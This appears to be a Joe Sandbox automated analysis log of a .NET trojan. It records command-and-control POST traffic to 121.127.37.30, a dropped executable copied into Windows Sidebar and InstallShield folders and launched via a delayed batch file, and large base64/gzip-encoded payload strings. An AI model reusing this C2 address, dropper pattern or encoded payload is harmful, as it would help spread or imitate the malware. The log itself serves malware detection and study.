                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownTCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknownHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.127.37.30
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linu
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1284740476.0000000004017000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                          System Summary

                          barindex
                          .NET source code contains very large strings
                          Source: A5EbyKyjhV.exe, s67.csLong String: Length: 1028508
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exe\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\981c2098d799b6Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC521D550_2_00007FFAAC521D55
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC5809A10_2_00007FFAAC5809A1
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E6CA90_2_00007FFAAC6E6CA9
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E04BB0_2_00007FFAAC6E04BB
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAACAAB74F0_2_00007FFAACAAB74F
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC501D5512_2_00007FFAAC501D55
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC4F1EC312_2_00007FFAAC4F1EC3
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC5609A112_2_00007FFAAC5609A1
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6D0DE912_2_00007FFAAC6D0DE9
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C9EFC12_2_00007FFAAC6C9EFC
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C6CA912_2_00007FFAAC6C6CA9
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CFCF212_2_00007FFAAC6CFCF2
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C04BA12_2_00007FFAAC6C04BA
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C756C12_2_00007FFAAC6C756C
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CEFA112_2_00007FFAAC6CEFA1
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CF82012_2_00007FFAAC6CF820
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CEFFA12_2_00007FFAAC6CEFFA
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6D02FA12_2_00007FFAAC6D02FA
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CF3F212_2_00007FFAAC6CF3F2
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAACA8B74F12_2_00007FFAACA8B74F
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AlRNHzIf.log 3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1304676851.000000001BF32000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exe, 00000000.00000000.1243276535.0000000001232000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1305830732.000000001CA43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1305830732.000000001CA43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: A5EbyKyjhV.exe, E32.csCryptographic APIs: 'TransformBlock'
                          Source: A5EbyKyjhV.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
                          Source: A5EbyKyjhV.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                          Source: A5EbyKyjhV.exe, s67.csBase64 encoded string: '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
                          Source: A5EbyKyjhV.exe, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                          Source: A5EbyKyjhV.exe, 76n.csBase64 encoded string: 'LWWTW134l/JeWpTMlR4FTdjzEeXu9U1g5p5riqDCFxOldAsEVh0+zs8ZsgReKY+KdSJatRPIU13gCjfHSkQclp0qypujSmXSm7eu/0+FjnWElzvzJLB24wZhepXEVRzNpDpIaxaHdcTRLzVC6RwdCSzOsAfXM+wb4oURibksvQm7uQEs5T3AIKJ9v+YlleexUoyW1sBfmKghRwRbqc9dvV/7SXFoj3J2chL2U8IzHeN26Gie2HChMEnWxlo/2FCm/uHKc89co7+yX0oyJfyJmhlNJwLaEF0Ebgo3amveP3VM3IKElNjOJmGEn/z4MFX1Za2LDtOeuNuTdRWlqzRMbQ==', 'VHnmVGDK5NVwqwQq2pTOpmN5wlnnWdvUDKpBeB/WYer9UPIbyjOk62x6sRG1ByWtPenFstaGpf7U6rBrYBz/2LxSmdMaVCSIKWIBosWJYqS1DVqwBDNixF58AEHe2+lVyHW59h824oixLKAiTUaOT27OYtZIEoNpHSb9VQUb0vCGTPd6v55kkINH1/MxckTWks8rIA/KsxWqwVzD5KYtBwMVX6l0gfWx9xvGiVlB2x4JwDtxEjV8evVSkGCgKjG3'
                          Source: A5EbyKyjhV.exe, 7YK.csBase64 encoded string: 'OkG9Mw9hvaLtQiMIGWZYJdTcyquZdD5AQ3jY5N7kXpreMNryUfPC5jZuQoLgCkDseKdW8xN3ZzAdwzQl96F8x2FrdzHQCbixl89BtUzgRWnFi58bXkgFeE5lFw3Jp618'
                          Source: A5EbyKyjhV.exe, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/63@0/1
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\DyXMTSsE.logJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeMutant created: \Sessions\1\BaseNamedObjects\Local\2104bcd367706e0ff53dd22047373df283e1a1506cf43ea95190e46de8cfe9d4
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\AppData\Local\Temp\6GXacmGvF1Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat"
                          Source: A5EbyKyjhV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: A5EbyKyjhV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: A5EbyKyjhV.exeReversingLabs: Detection: 73%
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile read: C:\Users\user\Desktop\A5EbyKyjhV.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\A5EbyKyjhV.exe "C:\Users\user\Desktop\A5EbyKyjhV.exe"
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe"
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: amsi.dllJump to behavior
